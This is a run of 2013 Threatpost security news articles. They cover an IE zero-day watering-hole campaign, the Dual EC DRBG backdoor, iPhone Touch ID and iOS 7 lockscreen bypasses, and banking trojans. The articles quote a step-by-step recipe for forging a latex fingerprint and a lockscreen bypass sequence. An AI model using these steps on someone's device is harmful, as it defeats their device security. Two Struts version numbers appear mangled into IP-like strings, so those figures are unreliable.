Threatpost for B2B
Attackers exploiting a zero-day vulnerability in Microsoft’s Internet Explorer browser have compromised several popular local Japanese media outlets and have infected systems belonging to government, high tech and manufacturing organizations in Japan.
Researchers at FireEye said the attacks appear to be a large-scale intelligence gathering operation and are dropping a knock-off of the McRAT remote access malware to exfiltrate data from compromised computers.
It is unclear whether the sites used in the watering hole attack have been cleaned up, said Darien Kindlund, manager of threat intelligence at FireEye, who said his company has been in contact with CERTs in Japan about the issue.
The news of the attacks coupled with the severity of the IE zero day prompted the SANS Internet Storm Center to raise its threat level over the weekend. In the meantime, IE users are still being urged to install a FixIt tool as a temporary mitigation for the vulnerability until a patch is released. Experts believe Microsoft will issue an out-of-band patch before its next Patch Tuesday release on Oct. 8. Microsoft would not comment on a timeline in fielding a request from Threatpost. Meanwhile, Metasploit engineers continue to work on an exploit module for this vulnerability, but to date, one is not yet available, a company spokesperson said.
The targeted attacks on Japanese organizations were reported by Qualys a week ago when Microsoft issued an advisory that an unpatched IE bug affecting all versions back to IE 6 was being exploited; Microsoft released a FixIt tool and urged IE users to install that as a mitigation until a patch was ready.
“This is as severe as any browser issue can be,” Rapid7 senior manager of security engineering Ross Barrett said.
Kindlund also notes that the attacks, which date back to Aug. 19, also coincide with major holidays and festivals in that part of the world; for example, today is Autumnal Equinox Day in Japan, a national holiday akin to Memorial Day in the U.S. Also, the China Moon Festival, a popular harvest festival, took place last week, meaning that fewer companies would be online and able to mitigate any issues.
FireEye named the attack Deputy Dog after a string found in the attack code. FireEye also said that it saw a payload executable file used against a Japanese target posing as an image file hosted on a Hong Kong server. Once it infects a host computer, it connects to a command and control server in South Korea over port 443; the callback traffic is unencrypted, despite its use of port 443, FireEye said, adding that a second sample it collected also connected to the same South Korean IP address.
FireEye said it also discovered a handful of malicious domains also pointing to the IP in South Korea, which allowed them to make the connection to an attack against security company Bit9 this year. The same email address that registered the South Korean server also registered a domain used in the attack on the security company.
“The exploit depends on a Microsoft Office DLL which has been compiled without Address Space Layout Randomization to locate the right memory segment to attack, but this DLL is extremely common and most likely will not lower the affected population by much,” said Qualys CTO Wolfgang Kandek. “While the attack is very targeted and geographically limited to Japan, it might not affect you at the moment. But with the publication of the shim, other attackers can now analyze the condition fixed and will be able to produce an equivalent exploit fairly quickly.”
Developers behind the Apache Struts framework have released an update that fixes two vulnerabilities.
Creators of the open-source web application framework are encouraging users to upgrade to Struts 188.8.131.52 immediately.
One of the fixes addresses an issue (CVE-2013-4316) in the Dynamic Method Invocation (DMI) feature that was previously thought to break users’ applications if relied on too heavily. It was previously enabled by default and flashed a warning that users should switch it off if possible. Now the feature is disabled by default – or if users want to employ a workaround, they can switch struts.enable.DynamicMethodInvocation to false in struts.xml.
The second fix involves a broken access control vulnerability issue (CVE-2013-4310) with Struts 2’s action mapping mechanism. A parameter in the mechanism was set up to support the prefix “action:” to make sure navigational information can be attached to buttons in forms. Unfortunately “under certain conditions” attackers could have used this feature to bypass security constraints. The update fixes the mechanism and restricts security constraints. Like the DMI issue, there’s a workaround, writing your own ActionMapper and, dropping support for “action:”
Part of the Apache Software Foundation, Struts is used by developers to build Java- based web apps. Those interested in learning more about the fixes can head to Apache’s version notes on Struts 184.108.40.206 and download what Apache is calling the “best available” version of the framework on its site.
Hackers from the venerable Chaos Computer Club in Germany have found a method for bypassing the new iPhone 5S Touch ID fingerprint security mechanism. The method, which is the first known technique for circumventing the iPhone’s newest security feature, involves taking a picture of a user’s fingerprint and then creating a latex copy of it to unlock the phone.
Since the TouchID mechanism was unveiled earlier this month, security researchers have been looking for ways to get around it. The CCC appears to have won the race, using a combination of a high-resolution picture and a latex mold of the user’s fingerprint in order to bypass the Touch ID security feature.
“First, the fingerprint of the enrolled user is photographed with 2400 dpi resolution. The resulting image is then cleaned up, inverted and laser printed with 1200 dpi onto transparent sheet with a thick toner setting. Finally, pink latex milk or white woodglue is smeared into the pattern created by the toner onto the transparent sheet. After it cures, the thin latex sheet is lifted from the sheet, breathed on to make it a tiny bit moist and then placed onto the sensor to unlock the phone. This process has been used with minor refinements and variations against the vast majority of fingerprint sensors on the market,” the CCC said in a statement.
The group, which has been active in security circles for decades, also posted a video demonstrating the technique. They said they were motivated to defeat the Touch ID in order to show that fingerprint biometrics don’t work.
“We hope that this finally puts to rest the illusions people have about fingerprint biometrics. It is plain stupid to use something that you can´t change and that you leave everywhere every day as a security token”, said Frank Rieger, a spokesperson for the CCC. “The public should no longer be fooled by the biometrics industry with false security claims. Biometrics is fundamentally a technology designed for oppression and control, not for securing everyday device access.” Fingerprint biometrics in passports has been introduced in many countries despite the fact that by this global roll-out no security gain can be shown.
Last week, a group of security researchers put together an informal effort to raise money for a bounty to reward whoever was first to hack Touch ID. Starbug, the CCC member who pulled off the Touch ID hack, will get that bounty, which amounts to nearly $10,000 as well as some other prizes, such as Bitcoins, wine and books.
Image from Flickr photos of Randy Chiu.
So now that RSA Security has urged developers to back away from the table and stop using the maligned Dual Elliptic Curve Deterministic Random Bit Generation (Dual EC DRBG) algorithm, the question begging to be asked is why did RSA use it in the first place?
Going back to 2007 and a seminal presentation at the CRYPTO conference by Dan Shumow and Niels Ferguson, there have been suspicions about Dual EC DRBG primarily because it was backed by the National Security Agency, which initially proposed the algorithm as a standard. Cryptographer Bruce Schneier wrote in a 2007 essay that the algorithm contains a weakness that “can only be described as a backdoor.”
Given the current climate and revelations about NSA surveillance of Americans, and implications the spy agency manipulated standards efforts, in particular those overseen by NIST, Dual EC DRBG and other crypto standards are going to be scrutinized top to bottom—not to mention the deterioration of trust in any product built on that standard.
“I wrote about it in 2007 and said it was suspect. I didn’t like it back then because it was from the government,” Schneier told Threatpost today. “It was designed so that it could contain a backdoor. Back then I was suspicious, now I’m terrified.
“We don’t know what’s been tampered with. Nothing can be trusted. Everything is suspect,” Schneier said.
Iin his essay, Schneier wrote that not only was the algorithm derided as slow compared to better available algorithms, but it had a bias, meaning that the random numbers it generates aren’t so random. Dual EC DRBG was one of four approved random bit generators in NIST Special Publication 800-90, but it sticks out like a sore thumb.
“What Shumow and Ferguson showed is that these numbers have a relationship with a second, secret set of numbers that can act as a kind of skeleton key. If you know the secret numbers, you can predict the output of the random-number generator after collecting just 32 bytes of its output,” Schneier wrote. “To put that in real terms, you only need to monitor one TLS Internet encryption connection in order to crack the security of that protocol. If you know the secret numbers, you can completely break any instantiation of Dual_EC_DRBG.
“The researchers don’t know what the secret numbers are,” Schneier said. “But because of the way the algorithm works, the person who produced the constants might know; he had the mathematical opportunity to produce the constants and the secret numbers in tandem.”
RSA advised its developer customers via email yesterday to no longer use the algorithm, following a similar NIST recommendation last week. The algorithm is the default pseudo random number generator in a number of RSA products, including the RSA BSAFE libraries and RSA’s key management product RSA Data Protection Manager. BSAFE is embedded in many applications, providing cryptography, digital certificates and TLS security. RSA said the current product documentation can help developers change the PRNG in their respective implementations. RSA also said it would review its products to determine where the algorithm is in use and make the appropriate changes.
RSA CTO Sam Curry told Wired magazine, which first reported the story yesterday, the algorithm has been part of RSA libraries since 2004, two years before it was approved by NIST.
“Every product that we at RSA make, if it has a crypto function, we may or may not ourselves have decided to use this algorithm,” Curry told Wired. “So we’re also going to go through and make sure that we ourselves follow our own advice and aren’t using this algorithm.”
Matthew Green, a cryptographer and research professor at Johns Hopkins University, said RSA had no good reason to use the algorithm, and its decision to do so puts the security of any product using the BSAFE library into question.
“There’s no good reason whatsoever, just none,” Green said. “There was no good reason before the [Crypto 2007] backdoor presentation. It was a poor decision then, and afterwards I kind of think it was malpractice. People have known about this for a long time.”
RSA’s core product, its SecurID two-factor authentication tokens, was breached in 2011 and data stolen in that attack was used to attack Lockheed Martin and others in the defense industry. RSA said it spent more than $66 million cleaning up from the attack and helping customers. An untold number of RSA SecurID tokens were recalled and replaced. A source close to the matter told Threatpost that SecurID currently does not use the Dual EC DRBG random number generator, nor did it prior to the 2011 attack.
In the meantime, the immediate fallout is that we should expect more technology companies to make similar announcements about NIST-approved and NSA-influenced encryption. Experts are concerned too about the damage being inflicted upon NIST as a standards body. It’s likely these revelations will force greater scrutiny on the NIST-NSA relationship and nudge users and providers away from the standard in time.
“The U.S. has had an enormous influence on crypto around the world because we have NIST,” Green said in an interview before the RSA news broke. “You could see people break away from NIST, which would hurt everyone, and move to regional standards. That stuff is a problem.
“We trust NIST because there are a lot smart people there. If you split up into regions, it’s possible things could get less secure,” Green added. “You could end up with more vulnerabilities; standards get weaker the less effort you put into it.”
Schneier agreed that scrutiny will tighten on NIST.
“The fact is, NIST has been tarnished badly, and we really need them,” he said. “This is the biggest problem: The NSA has broken the fundamental social contract of the Internet.”
Another iOS, another iPhone lockscreen bypass flaw.
Hackers have had a only few days to play around with Apple’s latest mobile operating system, iOS 7, but apparently that’s all the time one of them needed to find a flaw that can allow anyone to bypass the lockscreen on phones running the much-buzzed about operating system.
Jose Rodriguez, an iPhone user in Spain who has proven in the past he’s proficient at bypassing iPhone lockscreens, has posted a new video to YouTube under the guise of videosdebarraquito.
In the video Rodriguez demonstrates how anyone can break iOS 7’s lockscreen to get full access to a users’ photo gallery, email and more with a few quick swipes of the finger.
Rodriguez swipes up on the phone’s lockscreen to access the control center, opens the timer application and holds the phone’s top button as if he’s going to turn it off. Instead, he hits cancel and double clicks the home button to access the phone’s side scrolling multitask feature.
Like any lockscreen hack, sometimes it’s easier said than done. In the video Rodriguez describes the click on the home button as a double click but “the second click is slightly stretched,” suggesting the bypass may be trickier to nail down.
Once in though, an attacker can open the phone’s camera, view photos and even send tweets or Facebook messages from the phone’s photo gallery.
As the video winds down, Rodriguez also demonstrates the bypass on an iPad running iOS 7.
Rodriguez found a similar lockscreen bypass flaw earlier this summer in the beta version of iOS 7. That bypass, which also utilized the upswipe feature in correlation with the phone’s calculator application, was fixed in the official iOS 7 release on Wednesday.
The update also addressed yet another lockscreen flaw that Rodriguez discovered on iOS 6.1 back in February. In that crack, he made an emergency call and held down the power button on an iPhone 5 twice to gain access to the phone, its contacts, voicemail and photos.
When contacted about the operating system’s most recent lockscreen flaw, Apple pointed us to a statement by company spokeswoman Trudy Muller. The statement just happens to be identical to one also made by Muller in February following Rodriguez’s iOS 6.1 hack: “Apple takes user security very seriously. We are aware of this issue, and will deliver a fix in a future software update,” Muller said.
The lockscreen hack is just one problem that’s popped up with iOS 7’s new swipeable control center. Earlier this week astute iPhone users noticed that anyone can take a users’ phone and enable Airplane Mode without entering the passcode – and in turn render the Find My iPhone function useless.
Researchers at Cenzic also noticed this week that if a user has the iPhone’s personal assistant Siri set up on iOS 7 they can send messages, post to Twitter and Facebook and call any phone without entering the passcode as well.
These aren’t all bugs per se – they’re more like security oversights as they can be tweaked in the settings.
Until the next OS update concerned users can head to Settings > Control Center on their phone to toggle “Access on Lock Screen” off to prevent it from popping up for just anyone.
There’s been an ongoing back and forth dialogue this week regarding the security of iOS 7 and the latest iPhone’s fingerprint reader. While a group of hackers have pooled together money for anyone who can bust the new Touch ID mechanism on the iPhone 5S, it seems that with the latest lockscreen hack, if you’re skilled and patient enough, there could be an even easier way into the devices.
It’s no fun being a cynic, thinking that everything is bad and getting worse. It’s easy–especially in the security community–but it’s not fun. But, in light of the latest in the interminable string of revelations about the NSA’s efforts to eat away at the foundation of the security industry, the only alternative available is the equivalent of believing in unicorn-riding leprechauns.
The security community didn’t invent the concept of fear, uncertainty and doubt, but it has perfected it and raised it to the level of religion. It’s the way that security products are marketed and sold, but it’s also the way that the intelligence community justifies its extra-legal and, in some cases, unconstitutional, data-gathering practices. Just as vendors use the specter of catastrophic hacks, data loss and public embarrassment to push their wares, the NSA and its allies have used the dark shadow of 9/11 and global terrorism to justify their increasingly aggressive practices, some of which have now been shown to have deliberately weakened some of the fundamental building blocks of security.
The most damning bit of string in this ball is the news that the NSA likely inserted a back door into a key cryptographic algorithm known as DUAL EC DRBG. That’s bad. What’s worse is that RSA on Thursday sent a warning to its developer customers warning them to immediately stop using the random number generator and select a new one when using the company’s BSAFE crypto libraries.
While this is the most recent, and probably the worst, piece in all of this, the steady accumulation of evidence over the last three months makes it difficult to come to any conclusion other than this: nothing can be trusted.
More to the point, we don’t know whether anything can be trusted. And that’s actually far worse than knowing that products X, Y and Z are compromised. If you know that, you can avoid those products. But now that we have direct evidence that the NSA is in fact actively working to undermine certain cryptographic protocols and partnering with technology vendors to produce certified pre-owned software and hardware, the big question is, what’s not broken?
Unfortunately, the answer is, we just don’t know.
In a much simpler and less cynical time–say, May–we thought that our intelligence agencies were in the business of spying on our enemies. Then came the first Edward Snowden leaks, and we discovered that the NSA was collecting all of our phone records. You know, just in case. Then we hear that the agency also vacuuming up much of the Internet traffic flowing through U.S. pipes because BOO! terrorism. But we still have encryption. As long as we can encrypt our email and Internet traffic, we’re safe from snooping, right? Oops. Turns out the NSA is in that henhouse too, working to weaken standards and crypto algorithms and also has some capabilities to circumvent things such as SSL.
And now, into this environment of accusation and innuendo comes the news that the attack on Belgian telco Belgacom revealed earlier this week reportedly was the work of the British spy agency GCHQ. The connection to NSA? GCHQ apparently used exploit technology developed by the NSA.
And on and on and on.
So we’ve come to the point now where the most paranoid and conspiracy minded among us are the reasonable ones. Now the crazy ones are the people saying that it’s not as bad as you think, calm down, the sky isn’t falling. In one sense, they’re right. The sky isn’t falling. It’s already fallen.
Image from Flickr photos of David Sedlmayer.
The FBI began warning computer users about the Beta Bot Trojan this week, sounding the alarm about malware that has targeted a variety of online payment platforms and financial institutions over the few last months.
According to an intelligence note prepared by the Internet Crime Complaint Center (IC3) yesterday, criminals have begun using the Trojan to block victims’ access to security websites, disable antivirus programs and trick them into giving hackers access to their computers.
According to the FBI, the malware has been spotted popping up on user’s computers in the form of a Microsoft Windows message box. When asked if users want to run a program, “Windows Command Processor,” users are being urged not to click “Yes.” The “User Account Control” box claims to just want to make changes to the computer but in actuality will allow hackers to “exfiltrate data from the computer,” including log-in credentials and financial information.
The malware has also been seen propagating on the popular messaging platform Skype and across USB thumb drives, according to the warning.
While the FBI refers to Beta Bot as new, the malware surfaced at the beginning of the year as an HTTP bot and later expanded its capabilities that spring, according to RSA’s Limor Kessem, who described it as a type of rootkit-based financial malware in May.
“It has since evolved,” Kessem wrote at the time, “donned a trigger list, and was repurposed for financial fraud that includes targets such as banks, ecommerce and even Bitcoin wallets.”
Kessem, who helps run the RSA’s Cybercrime and Online Fraud Communications division said at the time the malware was trying to leverage everything from larger financial institutions to “payment platforms, online retailers, gaming platforms, webmail providers, FTP and file-sharing user credentials,” among other vectors.
While Kessem reported that Beta Bot’s creator was planning to keep the Trojan private but would sell binaries and provide technical support, Beta Bot was never thought to have been as sophisticated as Trojans designed specifically for bank fraud, so it’s unclear if the FBI’s warning coincides with a new rash of Beta Bot infections or a new set of technical capabilities for the malware.
Regardless the FBI is urging any infected users to download antivirus updates onto an uninfected computer or USB drive and run it on the compromised machine.
A string of watering hole attacks targeting oil and energy companies dating back to May could be linked to similar attacks against the U.S. Department of Labor website.
Researchers at Cisco discovered the compromised domains of 10 oil and energy companies worldwide, including hydroelectric plants, natural gas distributors, industrial suppliers to the energy sector and investment firms serving those markets. Six of the 10 sites shared the same Web design firm and three of the six are owned by the same parent company. Cisco researcher Emmanuel Tacheau speculates that credentials at the Web design firm were stolen, leading to the compromises.
The 10 sites were exploited and serving iframe redirects to other sites hosting espionage malware, possibly the Poison Ivy remote access Trojan.
“The assumption is, with the target companies being in the energy sector, they were attempting to infect machines within that sector and exfiltrate intellectual property,” Tacheau said.
The iframes load exploit code and malware from three compromised domains—keeleux[.]com, kenzhebek[.], and nahoonservices[.]com. The exploits target primarily a Java vulnerability, CVE-2012-1723, or a flaw in Internet Explorer 8, CVE-2013-1347. A Firefox exploit was also found in these attacks, CVE-2013-1690.
Cisco said the malware used in the attacks is a Trojan that captures system configurations, as well as clipboard and keyboard data. It also establishes an encrypted connection to a command and control server hosted in Greece awaiting commands. All of the infected sites were notified and most had been cleaned up, Cisco said.
“Detection for the malware was extremely low, so that’s always a concern,” Tacheau said. “Fortunately, exploit detection for the exploits used is pretty good, so hopefully people will have been protected.”
Watering hole attacks are effective because they target websites of interest to the intended victim. In the past, government policy resource websites and mobile developer forums have been compromised in other watering hole attacks.
The IE vulnerability was patched in May, but not before those attacks spread to nine other sites including the US Agency for International Development (USAID) and research firms in Asia.
Given the timing of the two attacks and the use of the same Internet Explorer exploit, the Department of Labor attacks could be tied to the energy and oil attacks as well.
“That’s the million dollar question,” Tacheau said. “There certainly are a lot of commonalities. If you combine the timing, the shared exploit and the sector targeted, it does seem at least suspiciously in favor of a semblance of attackers.”
The oil and energy attacks, however, were found coincidentally by Cisco researchers looking at system logs and noticing the commonalities in the sectors targeted.
“It boils down to a matter of volume,” Tacheau said. “These were low volume-high stakes attacks; these sites don’t attract a large number of visitors. The DOL attacks were different. When you have a high profile site like that, those are always going to be spotted off the bat.”
With all of the disturbing revelations that have come to light in the last few weeks regarding the NSA’s collection methods and its efforts to weaken cryptographic protocols and security products, experts say that perhaps the most worrisome result of all of this is that no one knows who or what they can trust anymore.
The fallout from the most-recent NSA leaks, which revealed the agency’s ability to subvert some cryptographic standards and its “partnerships” with software and hardware vendors to insert backdoors into various unnamed products, has continued to accumulate over the course of the last couple of weeks. Cryptographers and security researchers have been eager to determine which products and protocols are suspect, and the discussion has veered in a lot of different directions. But one thing that’s become clear is that when the government lost the so-called Crypto Wars in the 1990s, the NSA didn’t just go back to Fort Meade and tend to its knitting.
“The good news, I thought until a couple of weeks ago, is that the government lost that war. What we didn’t realize is that the Crypto Wars never ended, they just moved underground,” Matthew Green, a cryptographer and research professor at Johns Hopkins University, said during a roundtable sponsored by the university on Wednesday. “Some of these standards were actually built to be less secure so that the NSA might be able to spy on us.”
One of the few bits of concrete information that’s emerged in all of this is that a random-number generator developed by NIST several years ago is now in question. Cryptographers have suspected for some time that the Dual_EC_DRBG random-number generator, which is included in some standards, may have been deliberately weakened. NIST issued a statement in the last few days warning people not to use Dual_EC_DRBG.
“Concern has been expressed about one of the DRBG algorithms in SP 800-90/90A and ANS X9.82: the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm. This algorithm includes default elliptic curve points for three elliptic curves, the provenance of which were not described. Security researchers have highlighted the importance of generating these elliptic curve points in a trustworthy way. This issue was identified during the development process, and the concern was initially addressed by including specifications for generating different points than the default values that were provided. However, recent community commentary has called into question the trustworthiness of these default elliptic curve points,” the NIST statement says.
Green said that the recent NSA leaks have reinforced the difficulty of producing good standards and algorithms, never mind trying to do so when the NSA has inserted itself surreptitiously into the process.
“Crypto is incredibly hard to get right when you’re not fighting someone like the NSA. How we deal with that when someone very powerful is going around us to build weaknesses in from the start?” Green said.
“We don’t know how good these standards are. Is there any way to rebuild that trust? How secure are we going to be when every moron in the world starts to build their own standards? If the NSA is doing it, then who knows who else might be doing it.”
Aside from the questions about weak or deliberately compromised protocols, experts also say there could be long-range ramifications for security vendors who are trying to sell their products to a suddenly skeptical customer base.
“Should we accept that being secure is worth the blowback? Should anybody trust us now?” Green said. “If we’re building this technology and exporting it to the rest of the world, why should anybody buy it? I don’t know what the impact is.”
Image from Flickr photos of Sebastien Wiertz.
UPDATE: In an earlier version of this story, we failed to give proper credit to Robert Graham for his involvement in this project.
A group of researchers, hackers, and other security enthusiast are pooling their money and offering it as a bounty to the first person that can successfully crack the Touch ID fingerprint authentication mechanism on Apple’s recently released iPhone 5S.
It all started as a discussion between security researchers Don Bailey and Nick DePetrillo, according to Bailey. DePetrillo then fired off a tweet, offering $100 to the first person that could lift a fingerprint off an iPhone 5S, recreate it, and reliably unlock the phone in five tries or fewer. From there, a number of other security professionals and hobbyists got in on the pot, mostly via twitter, which is now worth more than $14,000 and counting. You can keep an eye on the growing pool of money the contest’s dedicated website, which was created by one of the contest’s other founding members, Robert Graham.
This is something of a casual contest, so a list of official rules is pretty much nonexistent. At first, in order to take the pot, DePetrillo said he wanted “a video of the process from print, lift, reproduction and successful unlock with reproduced print,” but he and Bailey are in agreement that they’ll pay out their portions of the pool for side channel demos as well. It is not clear what criteria the other contributors will use to decide whether or not an attack is worthy of their money too.
The clearest criteria seems to be that the attack exploits either hardware or the software associated with the Touch ID interface. A simple lock screen circumvention is not enough.
The contest is mostly for fun, but there is a serious element to it.
“We want to get more people aware of the new pieces of hardware functionality coming out,” Bailey said in a phone interview. “Because not a lot of people are looking at hardware security, and by doing things like this we get to put a spotlight on security in places where people usually presume it’s either too easy or too hard.”
The contest is based at least in part, according to Bailey, on the fact that these sorts of sensor-based functionalities are implemented into products in such a way that they take up as little room and require as little energy and processing power as possible, despite their versatility.
“You usually get an absurd amount of functionality in a sensor,” Bailey said. “But really when it actually comes to use-case, drivers are actually implemented with the least amount of capabilities necessary to accomplish a task.”
He went on to say that he and DePetrillo are gaming on the idea that Apple could be doing things in a more complicated way, but they aren’t – because they are probably just doing the best they can to get a competent piece of hardware out the door as fast as possible.
Bailey said that no one has come forward yet with a working exploit or otherwise indicated that they are closing in on one, but indicated that a lot of people – himself included – are taking a crack at hacking Touch ID. He and DePetrillo are hoping an exploit will emerge in the next couple of weeks.
When asked if he would take the bounty for his own contest if he were to be the one to break touch ID, Bailey said, quite emphatically:
“Hell yeah, I’ll take the bounty!”
Anyone is welcome to contribute to the bounty, and can work that out with Bailey, DePetrillo, whoever else has gotten involved on Twitter at the following hashtag: #istouchidhackedyet.
They are asking for a minimum contribution of $50, but some individuals are putting up larger sums of money – Graham in particular, who doled out nearly $75 for the domain name and six months of web hosting – and a lot of people are offering up Bitcoins. One person is offering a free iPhone 5C to whoever breaks the fingerprint scanner. Just before initial publication, Arturas Rosenbacher, an entrepreneur and venture capitalist, pledged $10,000.
The National Security Agency, as it turns out, is just as reactive when it comes to information security as 99 percent of the enterprises out there.
America’s top spy agency gives out too much privileged access to employees and contractors, allows removable storage devices in sensitive areas, and has no system of checks and balances with regard to those employees with privileged access. And only when the stuff hits the fan, as it has with Edward Snowden, does it amp up its security.
NSA Technology Directorate Lonny Anderson was interviewed on National Public Radio yesterday and told the world that the agency’s investigators have figured out how Edward Snowden got his hands on all those sensitive documents.
“We have an extremely good idea of exactly what data he got access to and exactly how he got access to it,” Anderson told NPR’s Morning Edition.
So does everyone else: You gave it to him. And now in true reactive fashion, the NSA has tightened up its loose policies and clamped down on privileged access. Let the next Snowden try that again.
Vilified by some as a traitor and hailed by others as hero for outing the depths of the NSA’s surveillance of Americans in the name of national security, Snowden should serve as the poster child for the damage one insider with the right password can do to any organization. Here’s a Booz Allen contractor hired by the NSA as a system administrator who walked away with enough secret information to rock the faith of a nation in its Constitution, the notion of privacy each American is supposed to treasure, and corrupt the trust Americans have in the government.
U.S. senators such as Dick Durbin (D-Ill.) have grilled NSA officials including director Keith Alexander about Snowden and why the agency would give someone with relatively little experience—Snowden is a high school and community college dropout with a GED who once worked as a security guard for the NSA—clearance and access to classified information.
“I have great concerns over the process and access he had,” Alexander said in June before the Senate Appropriations Committee. “We have to look into it and fix it across the intelligence community. We have to look at the processes and oversight of those processes, determine where it went wrong and how we’re going to fix it.”
Could it all have been avoided? Sure, I suppose. But human nature being what it is, most of us don’t put measures in place to fix problems before they happen. We wait until our teeth hurt to go to the dentist. We put on 20 pounds too many before we watch what we eat. And we give out too much access and assign too many system permissions until documents go missing and people double up on their mistrust of the government.
Two unnamed officials also talked to NPR, saying that the access Snowden had was part and parcel of his job as a system admin. He had access to a NSA intranet page where documents, memos, PowerPoint slides and other data were stored in order for analysts to read and discuss them online. Snowden had secret compartmented clearance to the data; ironically enough it was his job to move those documents from the Intranet to a secure location for analysts to access them. Worse, NSA officials knew Snowden was accessing the data, but just figured he was doing his job, the NPR report said.
Anderson, the NSA CTO and CIO, said policies and procedures on the site have changed.
“Someone today could get access to that Intranet because it still exists,” Anderson said. “Could someone today do what he did? No.”
Back in June when the leaks were made public in the Guardian—and long before—Anderson acknowledged that NSA laptops had USB drives and analysts and admins had the ability to insert thumb drives and store data on removable media.
“One thing we have done post media leaks is lock those down hard so that those are all in two-person control areas,” Anderson said, referring to a new two-person rule implemented by the NSA post-Snowden. Details are scarce, but two NSA employees with similar roles must work together to perform certain tasks.
“It’s impossible to work on their own now,” Anderson said. “If you’ve got privileged access on our networks like a system administrator, you’re being given a privilege that very few people have. You’re not going to be doing anything alone.”
He also said that the NSA is tagging data, likely through some kind of rights management technology, enabling NSA leaders not only to determine who gets access to documents, but to monitor the data as it is being accessed.
The NSA should serve as an object lesson to any organization about the risks posed by privileged insiders. Resources exist from places such as Carnegie Mellon’s Software Engineering Institute that help you spot shady insiders and other trends in people and behavior that can limit potential damage. But will it make a difference? Probably not, because while most enterprises talk a good game about security, the fact is that most are doing just enough in order to comply with an industry regulation and loose policies will continue to be the norm.
Understand too that while it’s easier to be reactive when bad things happen than to anticipate every possibility and every outcome, remember that bad guys are really good at winning cat and mouse games; in fact, anyone intent on gaming any system is likely to be always be a step ahead of the good guy.
We are one day in and Apple’s sleek new mobile operating system, iOS 7, has been dissected to death – the colors, the similarities to Android’s OS, the amount of time it took some users to download the update from Apple’s servers. Those talking points aside, the update also brought a slew of bug fixes, 80 in total, to devices that should appease Apple users with security concerns.
The update fixes a handful of issues, most which could lead to a denial of service attack or trigger unexpected application termination or arbitrary code execution on devices like an iPad, iPod Touch or iPhone running an out of date OS.
Some of the bigger flaws addressed involve two fixes for passcode bypass flaws, one (CVE-2013-0957) that could’ve allowed an attacker to break an app in the third-party sandbox and determine the user’s passcode and a second (CVE-2013-5147) that exploited the way the iPhone handled calls to bypass the screen lock in iOS 6.1.
Another similar data privacy bug could have allowed an attacker to intercept user credentials by compromising a TrustWave certificate (CVE-2012-5134). TrustWave issued and subsequently revoked the faulty sub-CA certificate.
Four Safari bugs were also addressed in yesterday’s update, including a problem where the browser’s history was still visible even after it was cleared and a problem stemming from a memory corruption issue in the way it handled XML files and a cross-site scripting flaw on sites that allow users to upload files.
The oldest bug in the batch appears to be a kernel issue from 2011 discovered by Marc Heuse where-in an attacker could have sent specially crafted IPv6 packets to an iPhone 4 and caused a high CPU load. While the bug is known as CVE-2011-2391 in the Common Vulnerabilities and Exposures database, the CVE warns the attached date does not necessarily reflect when the vulnerability was discovered.
Several vulnerabilities from 2012 are also addressed in the update, all involve fixing arbitrary code execution bugs in the libxml and libxslt libraries.
While not discussed in the update notes, iOS 7 also fixes a previously disclosed “USB charger” bug that surfaced in August that allowed hackers complete access to devices via a modded charger. Apple spokesman Tom Numayr confirmed last month that iOS 7 would give users the choice whether or not they want to trust the computer their device has been connected to.
Those interested in the full rundown of security fixes can head to Apple’s Mailing Lists email, posted yesterday.
A researcher has discovered a privacy bug in the Facebook Android app that enables an attacker to view and download any images that a user sends to Facebook. The problem derives from the fact that the app, along with the official Facebook Messenger app for Android, don’t send those images over HTTPS, even though the apps are meant to do so.
The researcher, Mohamed Ramadan, reported the vulnerability to Facebook in February, and the company fixed the issue, Ramadan said. The bug affected the official Facebook and Facebook Messenger apps for Android, both of which are designed to send requests via a secure HTTPS connection. However, Ramadan found that in some cases the apps would send requests to the Facebook servers over plain HTTP. Specifically, he noticed that it happened when uploading photos.
What that means is that an attacker who is able to capture a target’s wireless traffic would be able to grab whatever images the target is uploading. The attacker could then do whatever he chooses with the photos.
“I found that the official Facebook Messenger and Facebook app for android latest version are sending and receiving images using HTTP protocol and any one on the same wireless network can sniff my traffic and view all images or even replace it with his own images,” Ramadan said in his report to Facebook.
Facebook took a month or so to respond to the report, Ramadan said, but when they did, they said that the security team had been able to reproduce the bugs and was going to pay Ramadan $1,500 as part of its bug bounty program. A nice reward for a bit of security research. But then, a short while later, the Facebook security team got in touch again to say that it was adding $500 to the bounty because Ramadan had reported both the Messenger and regular app bugs.
The Android Facebook apps have been updated to fix this issue, and Ramadan said he recommends that users install the updates to avoid running into a problem with their private photos ending up in the wrong hands.
“It is time to update your Facebook apps right now, if you are a bit lazy like me and forget to update android apps then UPDATE NOW!” he said.Image from Flickr photos of mkhmarketing.
Two dozen major U.S. and European banks are in the crosshairs of the Shylock, or Caphaw, financial malware of late, and victims who trade with one of the 24 financial institutions are at risk of giving up their credentials and losing assets in their accounts.
Malware researchers have noticed a rise in infections of late; the malware has been in circulation since 2011, however. While the initial infection point is unknown, the malware is adept at hiding its tracks. It uses a Domain Generation Algorithm to route phone-home traffic through a number of IPs created using self-signed SSL certificates.
“This limits the ability of traditional network monitoring solutions to dissect the packets on the wire for any malicious transactions,” said Zscaler researchers Sachin Deodhar and Chris Mannon in a blogpost today. Most of the infections, they said, are happening in the U.K., Italy, Denmark and Turkey.
DGA has been used previously by other malware families to disguise themselves from detection services and software. Domain generation algorithms periodically generate and test new domain names and determine whether a command and control server responds to a request. Static reputation servers that maintain lists of C&C domains don’t fare well against DGA. On the attacker’s end, by using DGA, they don’t need to manage a command and control infrastructure of servers that can be targeted by researchers and law enforcement for takedown.
Botnets and malware families such as PushDo, Zeus and TDL/TDSS also use DGA to attack financial customers, send spam or assist in targeted attacks against government, military and political organizations.
Shylock has been modified many times, adding features that help it slip past security detection software and services and frustrate researchers trying to analyze it. It has also added features such as webinjects to help it install malware on compromised machines on the fly, and plug-ins that help it spread over Skype instant messages.
“Administrators should view this transaction as a starting point for their investigation into any suspicious activity,” the researchers wrote. “It is not a malicious service, but illustrates how malware writers can leverage even legitimate services.”
Experts speculate that an exploit kit is serving up the latest Caphaw infections and exploiting vulnerabilities in Java to get onto a victim’s machine. It then drops an executable that varies for every infection, putting a damper on the ability to detect infections.
“The large number of potential rendezvous points with randomized names makes it extremely difficult for investigators and law enforcement agencies to identify and take down the CnC infrastructure,” the Zscaler researchers wrote. “Furthermore, by using encryption, it adds another layer of difficulty to the process of identifying and targeting the command and control assets.”
To date, Zscaler has found 64 Caphaw samples and 469 IP addresses making a call to a DGA location.
